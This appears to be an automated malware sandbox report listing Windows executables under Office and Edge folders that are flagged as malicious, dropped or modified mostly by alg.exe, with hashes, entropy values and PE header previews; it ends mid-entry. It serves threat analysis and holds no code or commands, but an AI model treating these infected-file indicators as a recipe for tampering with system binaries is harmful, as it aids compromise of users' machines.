                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:dLi2/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:vLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:F758B3C5BD8F17402D4A326FB54A879A
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:FEA82AA572E06340C3F3748E14314976D7268F40
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:9DBFE7403DD2E10BA85FF722D7E4849A92EA5E83F2A4F9BBDA1BA9A437DC9110
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:E62683B662720B8C9D8A251EBC403026A75870C23DFA8C82F6AC9FEE6251B626AFFC9589DA4D78BC6C7D23905FD4A448B09856011703D20E1EFBBAF3D7A451B8
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......,3.zhR.)hR.)hR.)a*.)`R.). .(nR.). .(wR.). .(oR.)hR.).V.). .(AR.). o)jR.). .(xR.). m)iR.). .(iR.)RichhR.)................PE..L...I.6..................&...H......`........@....@........................... .................. ...........................Q.......`..(...........................`^..T....................B..........@............P...............................text....$.......&.................. ..`.data........@.......*..............@....idata..l....P.......2..............@..@.rsrc...(....`.......@..............@..@.reloc.......p.......F..............@...................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe

                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1443328
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.837554933488695
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:6Li2/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:ILNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:456BCA72012D288D133A4B81A52D341C
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:17050ADAC2CE4B85C3739F5B303F5203E3B50599
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:7ECBC1016F215FAD26D356D65D2B6FEDE0C4BDFA58A7636A061719E3BBE0DA36
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:F301A940CF2736BFC65AEBE23DD4A2FA661B330B6FCCE26554ADF4C67C040D3778FF676DFB6E692B1A909EC0E4CA95DBA6062251BFB5C06F91AA95BD196F1F28
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......,3.zhR.)hR.)hR.)a*.)`R.). .(nR.). .(wR.). .(oR.)hR.).V.). .(AR.). o)jR.). .(xR.). m)iR.). .(iR.)RichhR.)................PE..L...I.6..................&...H......`........@....@........................... .....qm........... ...........................Q.......`..(...........................`^..T....................B..........@............P...............................text....$.......&.................. ..`.data........@.......*..............@....idata..l....P.......2..............@..@.rsrc...(....`.......@..............@..@.reloc.......p.......F..............@...................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe

                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1499136
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.791832788647888
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:TfG/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:TfGLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:63582813BE3568755F58FCA785319A48
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:12EC45D661076A0893729344E99FD1455AAA8A65
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:846CAA9C8BF710ECF19DAC84A9E7596E020AA4DFD8507C39132831015E3FF3CC
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:CF679D99EBF46062D09C27331DD0A829520375D0462B21018292BE91491F9507F9225032C0AA4A0827DD3FB3E3475231073D7CB73A61563FDA30B3E0EB074684
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... .(.d.F.d.F.d.F.m..l.F...B.h.F...E.`.F...C.{.F...G.c.F.d.G...F...N.M.F.....f.F.....e.F...D.e.F.Richd.F.................PE..d....~0/.........."..........P.................@..............................!........... .......... ...................................... ........ ..(...............................T....................e..(...`d..8............e...............................text............................... ..`.rdata..............................@..@.data...@...........................@....pdata..............................@..@.rsrc...(.... ......................@..@.reloc.......0....... ..............@...........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe

                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1651712
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.157779583176164
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:rbUO42q/EH/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:rxHLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:EA253329DFD0B6AFD3A0AA9FA9564C7D
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:C84D9EA91827EBD2306040B83BD9B8A3260028B8
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:611E072FE012B3C47D4D496ECE8B8BEF706F5FC7340B595F70C976DC80CA4222
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:6BA980858BFD16C83840A2E385BA8417FF7831F2E519AE69004DDF9DE73CAB5774A375DFB317792737C11B59672B2D298F7E7FCA1821A212E83D35127A654949
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......X..i.v.:.v.:.v.:...;9v.:...;.v.:...;.v.:.v.:.v.:...;$v.:...;4v.:...:.v.:...;.v.:Rich.v.:........................PE..L......m.................0...|...............@....@..........................0$.................. ......................................................................T...................`[..........@............p...............................text...l/.......0.................. ..`.data...@'...@.......4..............@....idata..@....p.......L..............@..@.c2r.................\...................rsrc................^..............@..@.reloc...............d..............@...................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe

                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):52712960
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.961787720074739
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:1572864:OLjL44lyBc+UN0qRsMjDAY9d5o/paLXzHLe:SicZmsR3Lo/cnLe
                                                                                                                                                                                                                                                                                                                                                                                        MD5:1266B89C5EC3075A539158491D96FCD5
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:920C00780F4BBC540F6836D732F0882E45A839BF
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:14BBFAF74AF02F4A6E6F7204F5FCCE7AAB2B62C5097E048FC8F9ABEA8A3EA475
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:7D759D9271667C3360D75191B34B3BEB8D0A24B60A62B298586BDEDC1FDB0C0994096F1415FCF9D9F7952D971B57D5BAA198EC6F2B6E249A996EBB9C69908C81
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......LN.../nB./nB./nB.]mC./nB.]kC./nB.TjC./nB.TmC./nB.TkC}/nB.FjC./nB.FkC3/nB.]hC./nB.]jC./nB.]oC?/nB./oBq-nB.TgC./nB.TkC./nB.TnC./nB.T.B./nB.TlC./nBRich./nB........................PE..L...1~............"....!.j(.........p]........(...@...........................$......j$..............................l3..t....3.0.....6.X............................./.p...................../.....h./.@.............(......j3.`....................text...jh(......j(................. ..`.rdata........(......n(.............@..@.data...t.... 4.......4.............@....didat..$.....5.......5.............@....rsrc...X.....6.......5.............@..@.reloc... ...........F..............@...................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe

                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1812992
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.252946035404719
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:zs8DMeflpnIOvYUa/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:zVDD9pnIOQLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:4E8BAAFBFFA1B9FAC0DB37B33BB2D402
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:5C833815C17C760CB6BF3B4D0AC69EFC2ECF134B
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:99F579A01F38174DD169319CDDEAA8AEC05978F9136403761B8970D7F5BD4710
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:D90C4B442E64919B91E1467161717B6C22D0810F5B18B83360614E7A33413F39CDD8F351591A0CAE1CA5A5AB0545411CE0F16B99643D484BE75EA351C7DF3DFC
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."..........J......@!.........@..............................'....._p.... .............................................................X........F......................T.......................(...P...@...........@...`............................text............................... ..`.rdata..8...........................@..@.data...XL....... ...d..............@....pdata...F.......H..................@..@.00cfg..8.... ......................@..@.gxfg....*...0...,..................@..@.retplne.....`...........................tls.........p......................@..._RDATA..\...........................@..@.rsrc...X...........................@..@.reloc...`..........................@...................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exe

                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):4364800
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.746539839202651
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:49152:CB1sstqMHiq8kBfK9a+cOVE/TqEpEepIkRqqUu9wg6KFYso8l8EnLNiXicJFFRGN:cHzorVmr2ZkRpdJYolR7wRGpj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:B19DD4685839A36B6D35ADED1EB72436
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:C29C799BD29B01B3DEB1F65F0D1A69360C0BD853
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:E4FCAFC318C75CD1B85D4CA74B8B9C468AA397D85E7E021BFA29E3B718E62CCF
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:90A97887092D172C5F2C0D00329582BD3CB6B215D1D18E2B51AB188279B506F78CAC05F8CE721C1527F1E5DD5EE4B639969AF88AE92F99C214CAFECF32EDC235
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e..........".......'..".......K.........@.............................PD.......B... .....................................................P.... 4.......2..Q..................to..8...................`j..(.....'.@...........0.......`........................text...'.'.......'................. ..`.rdata...A....'..B....'.............@..@.data........./......./.............@....pdata...Q....2..R....0.............@..@.00cfg..0....p3......42.............@..@.gxfg....2....3..4...62.............@..@.retplne......3......j2..................tls..........3......l2.............@...LZMADEC.......3......p2............. ..`_RDATA..\.....4.......2.............@..@malloc_h......4.......2............. ..`.rsrc........ 4.......2.............@..@.reloc... ...0;.......9.............@...................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe

                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1394176
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.6754936418532695
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:1EyTA/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:Cy8LNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:80D707FEB4CE424B190025142A7A24F6
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:89C4AFFAE80324951C0A4BAEA90D3AF6F2316CF1
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:EE587CCAE2DA08C1B7A64900823D42D580CEA6A73EC9A879B906290F38CF68E4
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:C27FBB0E8B401D28B82963D95D4603584F69236A7FC598B59F2BF21727E41E1955DE8EA76712D14C6CFAD27B7E19A706E7EC0349162985DE134F881F8AE712CB
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."............................@.............................` ........... ..................................................]..(....................................W..T...............................@............`..X............................text............................... ..`.rdata..,...........................@..@.data...0............j..............@....pdata...............v..............@..@.00cfg..8...........................@..@.gxfg...P...........................@..@.retplne................................_RDATA..\...........................@..@.rsrc...............................@..@.reloc...`..........................@...........................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe

                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\AsusSetup.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):2354176
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.046444096806811
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:49152:QhDdVrQ95RW0YEHyWQXE/09Val0GCLNiXicJFFRGNzj3:QhHYW+HyWKJ7wRGpj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:CBF202B063F059F65F8A6C7DB7B54192
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:8C9C55122E8C2AC8E04FDE3B3F203157471F9AC3
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:D5807057116F9CB60929368396068B0B1962CF5B672FBCE4597A9A8426D84A92
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:9FA20AED95CAB6C5AFA4ED723FB4A42BB709F807A1200BCC1E04C20BA60CE4B722EBA1F90D951B6F439EF3F05C13D5C16A5BC0455133B11EF4A2D40C63A8ACBD
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."......2...........b.........@.............................`%........... .........................................p%......>).......@..................................8.......................(....c..@........... 0..P............................text....0.......2.................. ..`.rdata.......P.......6..............@..@.data...4...........................@....pdata..............................@..@.00cfg..0...........................@..@.gxfg............0..................@..@.retplne.................................tls....!...........................@..._RDATA..\.... ......................@..@malloc_h.....0...................... ..`.rsrc........@......................@..@.reloc.......`......................@...........................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe

                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1825280
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.153860294869928
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:M70E0ZCQZMiU6Rrt9RoctGfmdd3/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:I0EzQSyRPRoc1LLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:020FA274E1B7EF115DC47EADD7EA47B8
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:68F478C4AAC6A2FDBB6938C89C3E5C536A481C63
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:3834E3BB368ADFEDBE02AF29CC2158FD4AA283ED84F404323CD904CF72D64287
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:7CD948C1E4D10F21AD016EE0FC69C766E45F4B3F421541D4086BCABC8934099C8C0C980FE2E58FDB0E12CB659E169F574F8B1FDCE50E095810A2E74BD566DF56
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."..........v.......k.........@.............................0......R..... ..........................................u......ly....... ..........,....................d..T...................hc..(.......@...........@... ............................text............................... ..`.rdata.............................@..@.data........@......."..............@....pdata..,...........................@..@.00cfg..0...........................@..@.gxfg....,..........................@..@.retplne.................................tls................................@..._RDATA..\...........................@..@malloc_h............................ ..`.rsrc........ ......................@..@.reloc.......0......................@...........................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe

                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1847808
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.140942964781337
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:ZiD2VmA1YXwHwlklb8boUuWPg2gc/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:YD2VmAyiwIb8boQHLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:40561BC13E8B65ADA5C9051925C7251E
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:41235ECA87AD1639FF242B7DFF80C3CA79674155
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:4AFF3BA7C2D34B9D6DF78C2FD23DBEF47BA15D329859F47A603FB263A3F0A979
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:8996FA1FBAC4243D7152971ACCFAB8FAE3A54162BC974027296FC7A79AAEDF03CFA09BDE1B6AAD6C7483A9763A9046C0A1E0AA3EA13B1228D953147FE436CF14
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."..................p.........@.............................p............ .........................................2...........d....`..8....P..........................8......................(.......@...............X...(........................text...4........................... ..`.rdata..|...........................@..@.data................r..............@....pdata.......P.......n..............@..@.00cfg..0...........................@..@.gxfg....,..........................@..@.retplne..... ...........................tls.........0.......0..............@..._RDATA..\....@.......2..............@..@malloc_h.....P.......4.............. ..`.rsrc...8....`.......6..............@..@.reloc.......p.......B..............@...........................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exe

                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):2853376
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.9482306118624315
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:49152:GfD3zO9ZhBGloizM3HRNr00vLNiXicJFFRGNzj3:cDaalxzM00v7wRGpj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:271E41515C37485007D927D2E11A9636
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:C8E04CD3FD20DBC1F4544383EB8C4A97B2787078
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:C2531A3865B3D37E8BE27A5416BEE38D11A24FD8490881045B462EF9D9ECC1D2
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:EA9B9ABB7CEEBAB8D116D0E87148363177E6D72E14E419FC70A0C5307B599D2E9089E580AA2F6029CDF15417BC065F067C01693A5EABBDA3C43F937F25E4BB49
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."......l...2......@..........@..............................-.....{.+... .................................................h.........!.. ...P ........................8......................(...P...@...............x............................text....k.......l.................. ..`.rdata...............p..............@..@.data...T....p.......^..............@....pdata.......P ......d..............@..@.00cfg..0.... !......* .............@..@.gxfg...P1...0!..2..., .............@..@.retplne.....p!......^ ..................tls..........!......` .............@...LZMADEC.......!......b ............. ..`_RDATA..\.....!......t .............@..@malloc_h......!......v ............. ..`.rsrc.... ....!.."...x .............@..@.reloc........$.......".............@...................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe

                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):4320256
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.822741417552192
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:49152:PTaRe7mkn5KLvD5qGVC0080pb4tgLUgGEsLABD5wTQh07yrLMLl9YPhoLNiXicJy:2I72LvkrDpbxJRoIM37wRGpj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:C9D45C17974524C0F2911C906638B7CB
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:EF7C5D4B87E5B509E50C4E406E0868D8C29D4651
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:6524477319E3531F44F4829C2A0508975E2B0E80ECC1DFE5213C9DAE798C3B30
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:556081B0A96848DB63263B255F3DED86B254768564E08CD6B7A1267F8C8FE3716846EDC122BEE421E326ED4FFB6EB73868BD9DA93CFBA608397F017E97132E01
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e..........".......,......... k.........@..............................C......IB... ..........................................'3......+3.P.....8.x....P6..e..................h.2.T.....................2.(...P"-.@............43.......3. ....................text...E.,.......,................. ..`.rdata..4#....-..$....,.............@..@.data........@4.......4.............@....pdata...e...P6..f...45.............@..@.00cfg..0.....7.......6.............@..@.gxfg...@4....7..6....6.............@..@.retplne......8.......6..................tls....-.... 8.......6.............@...CPADinfo8....08.......6.............@...LZMADEC......@8.......6............. ..`_RDATA..\....`8.......6.............@..@malloc_h.....p8.......6............. ..`.rsrc...x.....8.......6.............@..@.reloc... ...p:.......8.............@...........................................................

                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe

                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):2062336
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.0931446857041704
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:IW9Jml9mmijviMnF+ZxmQWcbLw8Vn/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:IWnm5iOMkjmQWkVnLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:545BC095F0D8CF6481B16EB1124B2C8E
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:480A8F4E1F7106DB30851FF241609CFEDA0D932C
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:7682D31F53484403F3EEB4558DEBFDF9B7A9037824005D6494ECAA46EFBFDE6D
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:79E4222B08772922D4EE579D3A96AF4603CA6A27EA0F65832B2E90B74AF0CD602B0378B94A4EC6743920F4F7B9C2F0B0E6540E9418B1AD1BA4ECABE6FBE2AA39
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."......h...4......P..........@.............................. ........... .................................................Z...................H......................8.......................(...`...@...........(...@............................text....g.......h.................. ..`.rdata...).......*...l..............@..@.data...............................@....pdata..H...........................@..@.00cfg..0....P.......H..............@..@.gxfg...p-...`.......J..............@..@.retplne.............x...................tls.................z..............@...CPADinfo8............|..............@..._RDATA..\............~..............@..@malloc_h............................ ..`.rsrc...............................@..@.reloc..............................@...................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe

                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1801216
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.161679828298311
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:zwNHwoYhua6MtjRO4qbBJTY6mY1uIgJ/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:zwNPdQO7BJTfmESLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:ED70335724770E3131D3270D74644631
